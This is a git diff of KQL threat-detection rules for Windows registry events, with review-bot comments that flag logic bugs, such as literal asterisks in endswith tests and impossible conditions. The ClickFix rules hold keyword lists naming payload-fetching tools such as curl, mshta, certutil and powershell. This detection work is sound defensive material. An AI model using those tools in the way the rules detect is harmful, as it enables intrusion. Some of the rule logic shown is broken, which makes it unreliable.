+// Tags: attack.execution, attack.t1204.004
+
+DeviceRegistryEvents
+| where ((RegistryValueData contains "#" and RegistryValueData contains "http") and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths\\url1") and ((RegistryValueData contains "account" or RegistryValueData contains "anti-bot" or RegistryValueData contains "botcheck" or RegistryValueData contains "captcha" or RegistryValueData contains "challenge" or RegistryValueData contains "confirmation" or RegistryValueData contains "fraud" or RegistryValueData contains "human" or RegistryValueData contains "identification" or RegistryValueData contains "identificator" or RegistryValueData contains "identity" or RegistryValueData contains "robot" or RegistryValueData contains "validation" or RegistryValueData contains "verification" or RegistryValueData contains "verify") or (RegistryValueData contains "%comspec%" or RegistryValueData contains "bitsadmin" or RegistryValueData contains "certutil" or RegistryValueData contains "cmd" or RegistryValueData contains "cscript" or RegistryValueData contains "curl" or RegistryValueData contains "finger" or RegistryValueData contains "mshta" or RegistryValueData contains "powershell" or RegistryValueData contains "pwsh" or RegistryValueData contains "regsvr32" or RegistryValueData contains "rundll32" or RegistryValueData contains "schtasks" or RegistryValueData contains "wget" or RegistryValueData contains "wscript"))
\ No newline at end of file
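Review bot: The new rule has no `// False Positives:` section, unlike the sibling rules touched in this commit (the RunMRU and AMSI Providers rules carry one), and it is the rule that needs it most: the keyword list includes generic substrings such as `account`, `human`, `cmd` and `curl`, so any URL with a `#` fragment typed into the Explorer address bar that happens to contain one of them satisfies the filter. Suggest adding, after the Tags line, `// False Positives:` and `// - Legitimate URLs containing a fragment ('#') and one of the generic keywords (e.g. 'account', 'verify') typed into the Explorer address bar`. It would also help triage to state in the description that `contains` matches anywhere in the value, so that the `high` level is read with that in mind.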
diff --git a/KQL/rules/Defense Evasion/hide_schedule_task_via_index_value_tamper.kql b/KQL/rules/windows/registry/registry_set/hide_schedule_task_via_index_value_tamper.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/hide_schedule_task_via_index_value_tamper.kql
rename to KQL/rules/windows/registry/registry_set/hide_schedule_task_via_index_value_tamper.kql
diff --git a/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key.kql b/KQL/rules/windows/registry/registry_set/hiding_user_account_via_specialaccounts_registry_key.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key.kql
rename to KQL/rules/windows/registry/registry_set/hiding_user_account_via_specialaccounts_registry_key.kql
diff --git a/KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql b/KQL/rules/windows/registry/registry_set/hypervisor_enforced_code_integrity_disabled.kql
similarity index 69%
rename from KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql
rename to KQL/rules/windows/registry/registry_set/hypervisor_enforced_code_integrity_disabled.kql
index fb262fb1..24dd96b5 100644
--- a/KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql
+++ b/KQL/rules/windows/registry/registry_set/hypervisor_enforced_code_integrity_disabled.kql
@@ -7,4 +7,4 @@
 // Tags: attack.defense-evasion, attack.t1562.001
 
 DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Microsoft\\Windows\\DeviceGuard\\HypervisorEnforcedCodeIntegrity" or RegistryKey endswith "\\Control\\DeviceGuard\\HypervisorEnforcedCodeIntegrity" or RegistryKey endswith "\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity\\Enabled")
\ No newline at end of file
+| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Control\\DeviceGuard\\HypervisorEnforcedCodeIntegrity" or RegistryKey endswith "\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity\\Enabled" or RegistryKey endswith "\\Microsoft\\Windows\\DeviceGuard\\HypervisorEnforcedCodeIntegrity")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/hypervisor_enforced_paging_translation_disabled.kql b/KQL/rules/windows/registry/registry_set/hypervisor_enforced_paging_translation_disabled.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/hypervisor_enforced_paging_translation_disabled.kql
rename to KQL/rules/windows/registry/registry_set/hypervisor_enforced_paging_translation_disabled.kql
diff --git a/KQL/rules/Persistence/ie_change_domain_zone.kql b/KQL/rules/windows/registry/registry_set/ie_change_domain_zone.kql
similarity index 100%
rename from KQL/rules/Persistence/ie_change_domain_zone.kql
rename to KQL/rules/windows/registry/registry_set/ie_change_domain_zone.kql
diff --git a/KQL/rules/Defense Evasion/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql b/KQL/rules/windows/registry/registry_set/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql
rename to KQL/rules/windows/registry/registry_set/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql
diff --git a/KQL/rules/Privilege Escalation/internet_explorer_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/internet_explorer_autorun_keys_modification.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/internet_explorer_autorun_keys_modification.kql
rename to KQL/rules/windows/registry/registry_set/internet_explorer_autorun_keys_modification.kql
diff --git a/KQL/rules/Defense Evasion/internet_explorer_disablefirstruncustomize_enabled.kql b/KQL/rules/windows/registry/registry_set/internet_explorer_disablefirstruncustomize_enabled.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/internet_explorer_disablefirstruncustomize_enabled.kql
rename to KQL/rules/windows/registry/registry_set/internet_explorer_disablefirstruncustomize_enabled.kql
diff --git a/KQL/rules/Command and Control/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql b/KQL/rules/windows/registry/registry_set/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql
similarity index 100%
rename from KQL/rules/Command and Control/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql
rename to KQL/rules/windows/registry/registry_set/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql
diff --git a/KQL/rules/Credential Access/lsass_full_dump_request_via_dumptype_registry_settings.kql b/KQL/rules/windows/registry/registry_set/lsass_full_dump_request_via_dumptype_registry_settings.kql
similarity index 100%
rename from KQL/rules/Credential Access/lsass_full_dump_request_via_dumptype_registry_settings.kql
rename to KQL/rules/windows/registry/registry_set/lsass_full_dump_request_via_dumptype_registry_settings.kql
diff --git a/KQL/rules/Persistence/macro_enabled_in_a_potentially_suspicious_document.kql b/KQL/rules/windows/registry/registry_set/macro_enabled_in_a_potentially_suspicious_document.kql
similarity index 100%
rename from KQL/rules/Persistence/macro_enabled_in_a_potentially_suspicious_document.kql
rename to KQL/rules/windows/registry/registry_set/macro_enabled_in_a_potentially_suspicious_document.kql
diff --git a/KQL/rules/Defense Evasion/maxmpxct_registry_value_changed.kql b/KQL/rules/windows/registry/registry_set/maxmpxct_registry_value_changed.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/maxmpxct_registry_value_changed.kql
rename to KQL/rules/windows/registry/registry_set/maxmpxct_registry_value_changed.kql
diff --git a/KQL/rules/Defense Evasion/microsoft_office_protected_view_disabled.kql b/KQL/rules/windows/registry/registry_set/microsoft_office_protected_view_disabled.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/microsoft_office_protected_view_disabled.kql
rename to KQL/rules/windows/registry/registry_set/microsoft_office_protected_view_disabled.kql
diff --git a/KQL/rules/Persistence/modification_of_ie_registry_settings.kql b/KQL/rules/windows/registry/registry_set/modification_of_ie_registry_settings.kql
similarity index 100%
rename from KQL/rules/Persistence/modification_of_ie_registry_settings.kql
rename to KQL/rules/windows/registry/registry_set/modification_of_ie_registry_settings.kql
diff --git a/KQL/rules/Persistence/modify_user_shell_folders_startup_value.kql b/KQL/rules/windows/registry/registry_set/modify_user_shell_folders_startup_value.kql
similarity index 100%
rename from KQL/rules/Persistence/modify_user_shell_folders_startup_value.kql
rename to KQL/rules/windows/registry/registry_set/modify_user_shell_folders_startup_value.kql
diff --git a/KQL/rules/Persistence/net_ngenassemblyusagelog_registry_key_tamper.kql b/KQL/rules/windows/registry/registry_set/net_ngenassemblyusagelog_registry_key_tamper.kql
similarity index 100%
rename from KQL/rules/Persistence/net_ngenassemblyusagelog_registry_key_tamper.kql
rename to KQL/rules/windows/registry/registry_set/net_ngenassemblyusagelog_registry_key_tamper.kql
diff --git a/KQL/rules/Execution/new_application_in_appcompat.kql b/KQL/rules/windows/registry/registry_set/new_application_in_appcompat.kql
similarity index 100%
rename from KQL/rules/Execution/new_application_in_appcompat.kql
rename to KQL/rules/windows/registry/registry_set/new_application_in_appcompat.kql
diff --git a/KQL/rules/Persistence/new_bginfo_exe_custom_db_path_registry_configuration.kql b/KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_db_path_registry_configuration.kql
similarity index 100%
rename from KQL/rules/Persistence/new_bginfo_exe_custom_db_path_registry_configuration.kql
rename to KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_db_path_registry_configuration.kql
diff --git a/KQL/rules/Persistence/new_bginfo_exe_custom_vbscript_registry_configuration.kql b/KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_vbscript_registry_configuration.kql
similarity index 100%
rename from KQL/rules/Persistence/new_bginfo_exe_custom_vbscript_registry_configuration.kql
rename to KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_vbscript_registry_configuration.kql
diff --git a/KQL/rules/Persistence/new_bginfo_exe_custom_wmi_query_registry_configuration.kql b/KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_wmi_query_registry_configuration.kql
similarity index 100%
rename from KQL/rules/Persistence/new_bginfo_exe_custom_wmi_query_registry_configuration.kql
rename to KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_wmi_query_registry_configuration.kql
diff --git a/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed.kql b/KQL/rules/windows/registry/registry_set/new_dns_serverlevelplugindll_installed.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed.kql
rename to KQL/rules/windows/registry/registry_set/new_dns_serverlevelplugindll_installed.kql
diff --git a/KQL/rules/Defense Evasion/new_file_association_using_exefile.kql b/KQL/rules/windows/registry/registry_set/new_file_association_using_exefile.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/new_file_association_using_exefile.kql
rename to KQL/rules/windows/registry/registry_set/new_file_association_using_exefile.kql
diff --git a/KQL/rules/Privilege Escalation/new_netsh_helper_dll_registered_from_a_suspicious_location.kql b/KQL/rules/windows/registry/registry_set/new_netsh_helper_dll_registered_from_a_suspicious_location.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/new_netsh_helper_dll_registered_from_a_suspicious_location.kql
rename to KQL/rules/windows/registry/registry_set/new_netsh_helper_dll_registered_from_a_suspicious_location.kql
diff --git a/KQL/rules/Persistence/new_odbc_driver_registered.kql b/KQL/rules/windows/registry/registry_set/new_odbc_driver_registered.kql
similarity index 100%
rename from KQL/rules/Persistence/new_odbc_driver_registered.kql
rename to KQL/rules/windows/registry/registry_set/new_odbc_driver_registered.kql
diff --git a/KQL/rules/Impact/new_root_or_ca_or_authroot_certificate_to_store.kql b/KQL/rules/windows/registry/registry_set/new_root_or_ca_or_authroot_certificate_to_store.kql
similarity index 100%
rename from KQL/rules/Impact/new_root_or_ca_or_authroot_certificate_to_store.kql
rename to KQL/rules/windows/registry/registry_set/new_root_or_ca_or_authroot_certificate_to_store.kql
diff --git a/KQL/rules/Privilege Escalation/new_run_key_pointing_to_suspicious_folder.kql b/KQL/rules/windows/registry/registry_set/new_run_key_pointing_to_suspicious_folder.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/new_run_key_pointing_to_suspicious_folder.kql
rename to KQL/rules/windows/registry/registry_set/new_run_key_pointing_to_suspicious_folder.kql
diff --git a/KQL/rules/Persistence/new_timeproviders_registered_with_uncommon_dll_name.kql b/KQL/rules/windows/registry/registry_set/new_timeproviders_registered_with_uncommon_dll_name.kql
similarity index 100%
rename from KQL/rules/Persistence/new_timeproviders_registered_with_uncommon_dll_name.kql
rename to KQL/rules/windows/registry/registry_set/new_timeproviders_registered_with_uncommon_dll_name.kql
diff --git a/KQL/rules/Privilege Escalation/office_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/office_autorun_keys_modification.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/office_autorun_keys_modification.kql
rename to KQL/rules/windows/registry/registry_set/office_autorun_keys_modification.kql
diff --git a/KQL/rules/Persistence/office_macros_warning_disabled.kql b/KQL/rules/windows/registry/registry_set/office_macros_warning_disabled.kql
similarity index 100%
rename from KQL/rules/Persistence/office_macros_warning_disabled.kql
rename to KQL/rules/windows/registry/registry_set/office_macros_warning_disabled.kql
diff --git a/KQL/rules/Defense Evasion/old_tls1_0_tls1_1_protocol_version_enabled.kql b/KQL/rules/windows/registry/registry_set/old_tls1_0_tls1_1_protocol_version_enabled.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/old_tls1_0_tls1_1_protocol_version_enabled.kql
rename to KQL/rules/windows/registry/registry_set/old_tls1_0_tls1_1_protocol_version_enabled.kql
diff --git a/KQL/rules/Persistence/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql b/KQL/rules/windows/registry/registry_set/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql
similarity index 100%
rename from KQL/rules/Persistence/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql
rename to KQL/rules/windows/registry/registry_set/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql
diff --git a/KQL/rules/Privilege Escalation/outlook_macro_execution_without_warning_setting_enabled.kql b/KQL/rules/windows/registry/registry_set/outlook_macro_execution_without_warning_setting_enabled.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/outlook_macro_execution_without_warning_setting_enabled.kql
rename to KQL/rules/windows/registry/registry_set/outlook_macro_execution_without_warning_setting_enabled.kql
diff --git a/KQL/rules/Persistence/outlook_security_settings_updated_registry.kql b/KQL/rules/windows/registry/registry_set/outlook_security_settings_updated_registry.kql
similarity index 100%
rename from KQL/rules/Persistence/outlook_security_settings_updated_registry.kql
rename to KQL/rules/windows/registry/registry_set/outlook_security_settings_updated_registry.kql
diff --git a/KQL/rules/Collection/periodic_backup_for_system_registry_hives_enabled.kql b/KQL/rules/windows/registry/registry_set/periodic_backup_for_system_registry_hives_enabled.kql
similarity index 100%
rename from KQL/rules/Collection/periodic_backup_for_system_registry_hives_enabled.kql
rename to KQL/rules/windows/registry/registry_set/periodic_backup_for_system_registry_hives_enabled.kql
diff --git a/KQL/rules/Persistence/persistence_via_disk_cleanup_handler_autorun.kql b/KQL/rules/windows/registry/registry_set/persistence_via_disk_cleanup_handler_autorun.kql
similarity index 100%
rename from KQL/rules/Persistence/persistence_via_disk_cleanup_handler_autorun.kql
rename to KQL/rules/windows/registry/registry_set/persistence_via_disk_cleanup_handler_autorun.kql
diff --git a/KQL/rules/Persistence/persistence_via_hhctrl_ocx.kql b/KQL/rules/windows/registry/registry_set/persistence_via_hhctrl_ocx.kql
similarity index 100%
rename from KQL/rules/Persistence/persistence_via_hhctrl_ocx.kql
rename to KQL/rules/windows/registry/registry_set/persistence_via_hhctrl_ocx.kql
diff --git a/KQL/rules/Persistence/persistence_via_new_sip_provider.kql b/KQL/rules/windows/registry/registry_set/persistence_via_new_sip_provider.kql
similarity index 100%
rename from KQL/rules/Persistence/persistence_via_new_sip_provider.kql
rename to KQL/rules/windows/registry/registry_set/persistence_via_new_sip_provider.kql
diff --git a/KQL/rules/Defense Evasion/potential_amsi_com_server_hijacking.kql b/KQL/rules/windows/registry/registry_set/potential_amsi_com_server_hijacking.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_amsi_com_server_hijacking.kql
rename to KQL/rules/windows/registry/registry_set/potential_amsi_com_server_hijacking.kql
diff --git a/KQL/rules/Defense Evasion/potential_attachment_manager_settings_associations_tamper.kql b/KQL/rules/windows/registry/registry_set/potential_attachment_manager_settings_associations_tamper.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_attachment_manager_settings_associations_tamper.kql
rename to KQL/rules/windows/registry/registry_set/potential_attachment_manager_settings_associations_tamper.kql
diff --git a/KQL/rules/Defense Evasion/potential_attachment_manager_settings_attachments_tamper.kql b/KQL/rules/windows/registry/registry_set/potential_attachment_manager_settings_attachments_tamper.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_attachment_manager_settings_attachments_tamper.kql
rename to KQL/rules/windows/registry/registry_set/potential_attachment_manager_settings_attachments_tamper.kql
diff --git a/KQL/rules/Defense Evasion/potential_autologger_sessions_tampering.kql b/KQL/rules/windows/registry/registry_set/potential_autologger_sessions_tampering.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_autologger_sessions_tampering.kql
rename to KQL/rules/windows/registry/registry_set/potential_autologger_sessions_tampering.kql
diff --git a/KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql b/KQL/rules/windows/registry/registry_set/potential_clickfix_execution_pattern_registry.kql
similarity index 59%
rename from KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql
rename to KQL/rules/windows/registry/registry_set/potential_clickfix_execution_pattern_registry.kql
index 1f7552b1..6c856384 100644
--- a/KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql
+++ b/KQL/rules/windows/registry/registry_set/potential_clickfix_execution_pattern_registry.kql
@@ -12,4 +12,4 @@
 // - Legitimate applications using RunMRU with HTTP links
 
 DeviceRegistryEvents
-| where (RegistryValueData contains "http://" or RegistryValueData contains "https://") and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU*" and ((RegistryValueData contains "account" or RegistryValueData contains "anti-bot" or RegistryValueData contains "botcheck" or RegistryValueData contains "captcha" or RegistryValueData contains "challenge" or RegistryValueData contains "confirmation" or RegistryValueData contains "fraud" or RegistryValueData contains "human" or RegistryValueData contains "identificator" or RegistryValueData contains "identity" or RegistryValueData contains "robot" or RegistryValueData contains "validation" or RegistryValueData contains "verification" or RegistryValueData contains "verify") or (RegistryValueData contains "%comspec%" or RegistryValueData contains "bitsadmin" or RegistryValueData contains "certutil" or RegistryValueData contains "cmd" or RegistryValueData contains "cscript" or RegistryValueData contains "curl" or RegistryValueData contains "mshta" or RegistryValueData contains "powershell" or RegistryValueData contains "pwsh" or RegistryValueData contains "regsvr32" or RegistryValueData contains "rundll32" or RegistryValueData contains "schtasks" or RegistryValueData contains "wget" or RegistryValueData contains "wscript"))
\ No newline at end of file
+| where (RegistryValueData contains "http://" or RegistryValueData contains "https://") and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU*" and ((RegistryValueData contains "account" or RegistryValueData contains "anti-bot" or RegistryValueData contains "botcheck" or RegistryValueData contains "captcha" or RegistryValueData contains "challenge" or RegistryValueData contains "confirmation" or RegistryValueData contains "fraud" or RegistryValueData contains "human" or RegistryValueData contains 
"identification" or RegistryValueData contains "identificator" or RegistryValueData contains "identity" or RegistryValueData contains "robot" or RegistryValueData contains "validation" or RegistryValueData contains "verification" or RegistryValueData contains "verify") or (RegistryValueData contains "%comspec%" or RegistryValueData contains "bitsadmin" or RegistryValueData contains "certutil" or RegistryValueData contains "cmd" or RegistryValueData contains "cscript" or RegistryValueData contains "curl" or RegistryValueData contains "finger" or RegistryValueData contains "mshta" or RegistryValueData contains "powershell" or RegistryValueData contains "pwsh" or RegistryValueData contains "regsvr32" or RegistryValueData contains "rundll32" or RegistryValueData contains "schtasks" or RegistryValueData contains "wget" or RegistryValueData contains "wscript"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_cobaltstrike_service_installations_registry.kql b/KQL/rules/windows/registry/registry_set/potential_cobaltstrike_service_installations_registry.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_cobaltstrike_service_installations_registry.kql
rename to KQL/rules/windows/registry/registry_set/potential_cobaltstrike_service_installations_registry.kql
diff --git a/KQL/rules/Privilege Escalation/potential_com_object_hijacking_via_treatas_subkey_registry.kql b/KQL/rules/windows/registry/registry_set/potential_com_object_hijacking_via_treatas_subkey_registry.kql
similarity index 66%
rename from KQL/rules/Privilege Escalation/potential_com_object_hijacking_via_treatas_subkey_registry.kql
rename to KQL/rules/windows/registry/registry_set/potential_com_object_hijacking_via_treatas_subkey_registry.kql
index 0c6a79b8..6f67d5b6 100644
--- a/KQL/rules/Privilege Escalation/potential_com_object_hijacking_via_treatas_subkey_registry.kql
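Review bot: `RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU*"` on the new `+| where` line keeps a trailing `*` as a literal character; KQL `endswith` has no wildcard semantics, so the predicate only matches a key name that literally ends in an asterisk and the rule will not fire on real RunMRU writes. The intended test looks like a path match, `RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU"`, which appears to be what the Sigma source expressed before conversion. The same literal-asterisk pattern is present in the TreatAs hunk (`"HKU*"`, `"Classes\\CLSID*"`) and in the new AMSI Providers rule (`"\\SOFTWARE\\Microsoft\\AMSI\\Providers*"`, `"\\SOFTWARE\\WOW6432Node\\Microsoft\\AMSI\\Providers*"`), which presumably came through the same conversion and need the same correction. The rule header (file lines 1-11) lies outside this hunk.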
+++ b/KQL/rules/windows/registry/registry_set/potential_com_object_hijacking_via_treatas_subkey_registry.kql
@@ -9,4 +9,4 @@
 // - Maybe some system utilities in rare cases use linking keys for backward compatibility
 
 DeviceRegistryEvents
-| where (ActionType =~ "RegistryKeyCreated" and (RegistryKey endswith "HKU*" and RegistryKey endswith "Classes\\CLSID*" and RegistryKey contains "\\TreatAs")) and (not(InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\svchost.exe"))
\ No newline at end of file
+| where (RegistryKey endswith "HKU*" and RegistryKey endswith "Classes\\CLSID*" and RegistryKey contains "\\TreatAs") and (not(InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\svchost.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql b/KQL/rules/windows/registry/registry_set/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql
similarity index 100%
rename from KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql
rename to KQL/rules/windows/registry/registry_set/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql
diff --git a/KQL/rules/Defense Evasion/potential_eventlog_file_location_tampering.kql b/KQL/rules/windows/registry/registry_set/potential_eventlog_file_location_tampering.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_eventlog_file_location_tampering.kql
rename to KQL/rules/windows/registry/registry_set/potential_eventlog_file_location_tampering.kql
diff --git a/KQL/rules/Defense Evasion/potential_pendingfilerenameoperations_tampering.kql b/KQL/rules/windows/registry/registry_set/potential_pendingfilerenameoperations_tampering.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_pendingfilerenameoperations_tampering.kql
rename to KQL/rules/windows/registry/registry_set/potential_pendingfilerenameoperations_tampering.kql
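Review bot: The new `+| where` line ANDs two suffix tests, `RegistryKey endswith "HKU*" and RegistryKey endswith "Classes\\CLSID*"`, which no string can satisfy at once, so the rule matches nothing regardless of the svchost exclusion; `HKU` names the hive and belongs at the start of the path, and the `*` is a literal character rather than a wildcard in KQL. A working form is `| where RegistryKey startswith "HKU" and RegistryKey contains "Classes\\CLSID" and RegistryKey contains "\\TreatAs" and not(InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\svchost.exe")`, with the hive prefix checked against what DeviceRegistryEvents actually records, since the table may use the long hive name rather than the abbreviation. Removing `ActionType =~ "RegistryKeyCreated"` also widens the rule to every action type on these keys, value deletions included; the same removal is made in the UserInitMprLogonScript hunk further down, where `| where ActionType =~ "RegistryValueSet" and RegistryKey contains "UserInitMprLogonScript"` would keep the scope that the `registry_set` directory implies. The header of both rules lies outside the hunk.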
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_using_debugpath.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_using_debugpath.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/potential_persistence_using_debugpath.kql
rename to KQL/rules/windows/registry/registry_set/potential_persistence_using_debugpath.kql
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_app_paths_default_property.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_app_paths_default_property.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/potential_persistence_via_app_paths_default_property.kql
rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_app_paths_default_property.kql
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_appcompat_registerapprestart_layer.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_appcompat_registerapprestart_layer.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/potential_persistence_via_appcompat_registerapprestart_layer.kql
rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_appcompat_registerapprestart_layer.kql
diff --git a/KQL/rules/Persistence/potential_persistence_via_autodialdll.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_autodialdll.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_persistence_via_autodialdll.kql
rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_autodialdll.kql
diff --git a/KQL/rules/Persistence/potential_persistence_via_chm_helper_dll.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_chm_helper_dll.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_persistence_via_chm_helper_dll.kql
rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_chm_helper_dll.kql
diff --git a/KQL/rules/Persistence/potential_persistence_via_custom_protocol_handler.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_custom_protocol_handler.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_persistence_via_custom_protocol_handler.kql
rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_custom_protocol_handler.kql
diff --git a/KQL/rules/Persistence/potential_persistence_via_dllpathoverride.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_dllpathoverride.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_persistence_via_dllpathoverride.kql
rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_dllpathoverride.kql
diff --git a/KQL/rules/Persistence/potential_persistence_via_event_viewer_events_asp.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_event_viewer_events_asp.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_persistence_via_event_viewer_events_asp.kql
rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_event_viewer_events_asp.kql
diff --git a/KQL/rules/Persistence/potential_persistence_via_excel_add_in_registry.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_excel_add_in_registry.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_persistence_via_excel_add_in_registry.kql
rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_excel_add_in_registry.kql
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_globalflags.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_globalflags.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/potential_persistence_via_globalflags.kql
rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_globalflags.kql
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_registry.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_logon_scripts_registry.kql
similarity index 86%
rename from KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_registry.kql
rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_logon_scripts_registry.kql
index 4c95740d..8f2365a3 100644
--- a/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_registry.kql
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_logon_scripts_registry.kql
@@ -9,4 +9,4 @@
 // - Investigate the contents of the "UserInitMprLogonScript" value to determine of the added script is legitimate
 
 DeviceRegistryEvents
-| where ActionType =~ "RegistryKeyCreated" and RegistryKey contains "UserInitMprLogonScript"
\ No newline at end of file
+| where RegistryKey contains "UserInitMprLogonScript"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_lsa_extensions.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_lsa_extensions.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_persistence_via_lsa_extensions.kql
rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_lsa_extensions.kql
diff --git a/KQL/rules/Persistence/potential_persistence_via_mpnotify.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_mpnotify.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_persistence_via_mpnotify.kql
rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_mpnotify.kql
diff --git a/KQL/rules/Persistence/potential_persistence_via_mycomputer_registry_keys.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_mycomputer_registry_keys.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_persistence_via_mycomputer_registry_keys.kql
rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_mycomputer_registry_keys.kql
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll_registry.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_netsh_helper_dll_registry.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll_registry.kql
rename to KQL/rules/windows/registry/registry_set/potential_persistence_via_netsh_helper_dll_registry.kql
